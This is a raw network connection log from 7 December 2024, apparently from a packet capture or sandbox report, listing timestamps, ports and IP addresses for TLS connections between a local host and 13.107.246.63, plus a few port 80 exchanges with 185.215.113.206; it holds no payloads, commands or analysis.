Dec 7, 2024 10:51:30.043183088 CET	443	49771	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.043245077 CET	49771	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.043509960 CET	49771	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.043530941 CET	443	49771	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.043816090 CET	443	49769	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.043874979 CET	443	49769	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.043935061 CET	49769	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.044291019 CET	443	49770	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.044348955 CET	443	49768	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.044361115 CET	443	49770	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.044424057 CET	49770	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.044433117 CET	443	49768	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.044532061 CET	49768	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.044960022 CET	49768	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.044977903 CET	443	49768	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.044987917 CET	49768	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.044997931 CET	443	49768	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.046946049 CET	49770	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.046947002 CET	49769	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.046952009 CET	443	49770	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.046956062 CET	443	49769	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.046966076 CET	49769	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.046971083 CET	443	49769	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.046993017 CET	49770	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.047000885 CET	443	49770	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.049535036 CET	49774	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.049550056 CET	49775	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.049577951 CET	443	49774	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.049593925 CET	443	49775	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.049643040 CET	49774	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.049683094 CET	49775	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.050142050 CET	49774	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.050154924 CET	443	49774	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.050414085 CET	49775	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.050432920 CET	443	49775	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.051214933 CET	49776	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.051239014 CET	443	49776	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.051240921 CET	49777	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.051255941 CET	443	49777	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.051340103 CET	49777	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.051342964 CET	49776	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.051476002 CET	49776	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.051487923 CET	443	49776	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.051490068 CET	49777	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.051503897 CET	443	49777	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.062076092 CET	443	49772	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.062150955 CET	443	49772	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.062371969 CET	49772	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.062510967 CET	49772	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.062521935 CET	443	49772	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.062535048 CET	49772	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.062540054 CET	443	49772	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.066165924 CET	49778	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.066179991 CET	443	49778	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.066329956 CET	49778	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.066493034 CET	49778	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:30.066507101 CET	443	49778	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.640244007 CET	80	49763	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:30.640315056 CET	49763	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:31.874458075 CET	443	49775	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:31.876564980 CET	443	49777	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:31.877585888 CET	443	49776	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:31.877660990 CET	443	49774	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:31.877748966 CET	443	49778	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:31.878093004 CET	49775	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:31.878106117 CET	443	49775	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:31.878597021 CET	49775	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:31.878602028 CET	443	49775	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:31.878936052 CET	49778	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:31.878957987 CET	443	49778	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:31.879290104 CET	49778	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:31.879297018 CET	443	49778	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:31.886455059 CET	49777	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:31.886486053 CET	443	49777	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:31.887176991 CET	49776	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:31.887190104 CET	443	49776	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:31.887197018 CET	49777	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:31.887202978 CET	443	49777	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:31.887537003 CET	49774	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:31.887552977 CET	443	49774	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:31.887900114 CET	49774	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:31.887904882 CET	443	49774	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:31.887996912 CET	49776	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:31.888003111 CET	443	49776	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.309611082 CET	443	49775	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.309674978 CET	443	49775	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.309722900 CET	49775	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.309988976 CET	49775	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.310004950 CET	443	49775	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.310018063 CET	49775	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.310024023 CET	443	49775	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.310709000 CET	443	49777	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.310791016 CET	443	49777	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.310832977 CET	49777	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.310945988 CET	49777	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.310964108 CET	443	49777	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.310973883 CET	49777	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.310980082 CET	443	49777	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.311470032 CET	443	49774	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.311532974 CET	443	49774	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.311579943 CET	49774	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.312005043 CET	443	49776	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.312067032 CET	443	49776	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.312103987 CET	49776	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.312184095 CET	49774	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.312200069 CET	443	49774	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.312711954 CET	49776	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.312730074 CET	443	49776	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.312743902 CET	49776	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.312748909 CET	443	49776	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.313539982 CET	443	49778	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.313612938 CET	443	49778	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.313652992 CET	49778	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.315104008 CET	49779	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.315129042 CET	443	49779	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.315192938 CET	49779	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.315274954 CET	49780	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.315277100 CET	49778	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.315283060 CET	443	49778	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.315299988 CET	443	49780	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.315305948 CET	49778	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.315310001 CET	443	49778	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.315344095 CET	49780	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.316459894 CET	49779	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.316479921 CET	443	49779	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.316551924 CET	49780	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.316566944 CET	443	49780	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.317122936 CET	49781	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.317143917 CET	443	49781	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.317210913 CET	49781	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.317312002 CET	49781	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.317323923 CET	443	49781	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.318321943 CET	49782	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.318334103 CET	443	49782	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.318394899 CET	49782	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.318567991 CET	49783	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.318572044 CET	49782	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.318582058 CET	443	49783	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.318583012 CET	443	49782	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:32.318636894 CET	49783	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.318758965 CET	49783	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:32.318773031 CET	443	49783	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:33.860477924 CET	443	49782	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:33.861237049 CET	49782	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:33.861264944 CET	443	49782	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:33.861768961 CET	49782	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:33.861773968 CET	443	49782	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.055510044 CET	443	49783	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.055635929 CET	443	49780	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.055771112 CET	443	49779	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.055809021 CET	443	49781	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.056122065 CET	49783	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.056133032 CET	49780	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.056145906 CET	443	49783	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.056153059 CET	443	49780	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.056688070 CET	49780	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.056694031 CET	443	49780	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.056794882 CET	49783	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.056802034 CET	443	49783	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.057034969 CET	49779	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.057051897 CET	443	49779	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.057271957 CET	49781	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.057281017 CET	443	49781	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.057416916 CET	49779	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.057423115 CET	443	49779	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.057746887 CET	49781	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.057753086 CET	443	49781	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.295717001 CET	443	49782	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.295797110 CET	443	49782	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.295897961 CET	49782	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.296746969 CET	49782	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.296775103 CET	443	49782	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.296788931 CET	49782	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.296804905 CET	443	49782	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.301592112 CET	49784	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.301630020 CET	443	49784	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.301696062 CET	49784	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.301868916 CET	49784	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.301882982 CET	443	49784	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.489217043 CET	443	49783	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.489288092 CET	443	49783	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.489337921 CET	49783	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.489604950 CET	49783	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.489618063 CET	443	49783	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.489628077 CET	49783	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.489633083 CET	443	49783	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.489924908 CET	443	49779	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.489989996 CET	443	49779	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.490031958 CET	49779	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.490164042 CET	49779	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.490181923 CET	443	49779	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.490190983 CET	49779	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.490197897 CET	443	49779	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.490401983 CET	443	49780	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.490462065 CET	443	49780	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.490541935 CET	49780	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.490596056 CET	443	49781	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.490664005 CET	443	49781	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.490705013 CET	49781	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.491393089 CET	49780	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.491393089 CET	49780	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.491429090 CET	443	49780	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.491439104 CET	443	49780	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.491482973 CET	49781	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.491489887 CET	443	49781	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.491502047 CET	49781	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.491504908 CET	443	49781	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.494374990 CET	49785	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.494404078 CET	443	49785	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.494446039 CET	49786	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.494484901 CET	49785	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.494493008 CET	443	49786	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.494537115 CET	49786	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.494837999 CET	49785	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.494848967 CET	443	49785	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.495538950 CET	49787	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.495547056 CET	443	49787	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.495608091 CET	49787	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.495731115 CET	49787	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.495740891 CET	443	49787	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.495743036 CET	49786	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.495760918 CET	443	49786	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.498044014 CET	49788	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.498080969 CET	443	49788	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:34.498137951 CET	49788	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.498426914 CET	49788	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:34.498439074 CET	443	49788	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:35.633622885 CET	80	49763	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:35.633867025 CET	49763	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:36.031122923 CET	443	49784	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.031877995 CET	49784	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.031904936 CET	443	49784	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.032454014 CET	49784	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.032459021 CET	443	49784	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.223743916 CET	443	49785	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.224272013 CET	49785	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.224293947 CET	443	49785	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.224520922 CET	443	49786	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.224853039 CET	49785	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.224858046 CET	443	49785	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.225255013 CET	49786	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.225272894 CET	443	49786	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.225372076 CET	443	49787	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.225805998 CET	49787	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.225821018 CET	443	49787	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.225857973 CET	49786	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.225863934 CET	443	49786	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.225908041 CET	443	49788	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.226258993 CET	49788	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.226284981 CET	49787	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.226289988 CET	443	49787	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.226293087 CET	443	49788	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.226686954 CET	49788	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.226711035 CET	443	49788	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.518131971 CET	443	49784	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.518196106 CET	443	49784	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.518289089 CET	49784	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.518534899 CET	49784	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.518549919 CET	443	49784	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.518560886 CET	49784	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.518565893 CET	443	49784	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.522150993 CET	49790	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.522187948 CET	443	49790	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.522331953 CET	49790	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.522495985 CET	49790	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.522511005 CET	443	49790	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.658308029 CET	443	49785	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.658364058 CET	443	49785	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.658413887 CET	49785	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.659533024 CET	443	49786	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.659586906 CET	443	49786	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.659631014 CET	49786	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.660020113 CET	443	49787	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.660096884 CET	443	49787	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.660593987 CET	443	49788	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.660655975 CET	49787	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.660676003 CET	443	49788	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.660720110 CET	49788	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.666855097 CET	49785	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.666872025 CET	443	49785	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.666882992 CET	49785	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.666888952 CET	443	49785	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.669994116 CET	49788	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.670011997 CET	443	49788	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.671240091 CET	49786	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.671263933 CET	443	49786	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.673188925 CET	49787	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.673188925 CET	49787	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.673193932 CET	443	49787	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.673202991 CET	443	49787	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.676582098 CET	49791	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.676608086 CET	443	49791	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.676717043 CET	49791	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.676956892 CET	49792	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.676984072 CET	443	49792	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.677051067 CET	49792	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.677618980 CET	49791	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.677629948 CET	443	49791	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.677701950 CET	49792	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.677716970 CET	443	49792	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.678426027 CET	49793	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.678442001 CET	443	49793	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.678538084 CET	49793	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.678733110 CET	49793	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.678744078 CET	443	49793	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.680389881 CET	49794	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.680398941 CET	443	49794	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:36.680509090 CET	49794	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.680705070 CET	49794	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:36.680722952 CET	443	49794	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.248342037 CET	443	49790	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.249135971 CET	49790	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.249146938 CET	443	49790	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.250053883 CET	49790	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.250058889 CET	443	49790	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.395842075 CET	443	49792	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.397618055 CET	443	49793	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.399041891 CET	443	49794	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.399116039 CET	443	49791	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.411499977 CET	49792	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.411556959 CET	443	49792	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.449439049 CET	49794	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.449440956 CET	49793	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.449444056 CET	49791	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.452121019 CET	49792	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.452130079 CET	443	49792	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.454025030 CET	49793	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.454036951 CET	443	49793	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.454893112 CET	49793	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.454899073 CET	443	49793	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.455513000 CET	49794	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.455519915 CET	443	49794	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.456216097 CET	49794	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.456221104 CET	443	49794	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.456763029 CET	49791	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.456772089 CET	443	49791	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.457415104 CET	49791	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:38.457427979 CET	443	49791	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.683423042 CET	443	49790	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:38.683504105 CET	443	49790	13.107.246.63	192.168.2.6
